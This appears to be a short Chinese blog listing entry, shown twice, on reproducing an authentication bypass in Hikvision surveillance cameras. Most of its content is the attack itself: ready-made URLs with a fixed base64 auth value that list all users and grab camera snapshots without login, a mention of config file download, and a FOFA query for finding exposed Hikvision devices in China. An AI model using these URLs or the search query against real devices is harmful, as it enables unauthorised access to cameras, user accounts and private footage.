海康威视摄像头漏洞复现 概述:通过构造url进行检索所有用户、屏幕截图、配置文件下载命令:检索所有用户:IP/Security/users?auth=YWRtaW46MTEK获取镜头快照而不进行身份验证:IP/onvif-http/snapshot?auth=YWRtaW46MTEK复现:fofa搜索 app=”HIKVISION-视频监控” && country=”CN”需要登录构造url绕过 2021-8-4 漏洞文章 图片数量: 5 评论数量: 1 0 0 24 上一页 1 2
海康威视摄像头漏洞复现 概述:通过构造url进行检索所有用户、屏幕截图、配置文件下载命令:检索所有用户:IP/Security/users?auth=YWRtaW46MTEK获取镜头快照而不进行身份验证:IP/onvif-http/snapshot?auth=YWRtaW46MTEK复现:fofa搜索 app=”HIKVISION-视频监控” && country=”CN”需要登录构造url绕过 2021-8-4 漏洞文章 图片数量: 5 评论数量: 1 0 0 24